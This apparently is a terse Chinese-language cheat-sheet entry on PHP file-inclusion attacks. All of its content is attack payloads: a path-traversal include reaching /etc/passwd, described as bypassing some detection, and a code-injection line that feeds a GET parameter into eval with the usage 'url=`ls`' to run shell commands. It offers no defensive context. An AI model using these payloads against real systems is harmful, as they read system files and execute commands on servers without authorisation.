0x01:文件包含
include("show.php?../../../../../../../../etc/passwd") 绕过一些检测
-----
eval("include ".$_GET['url'].";"); 利用方式:url=`ls`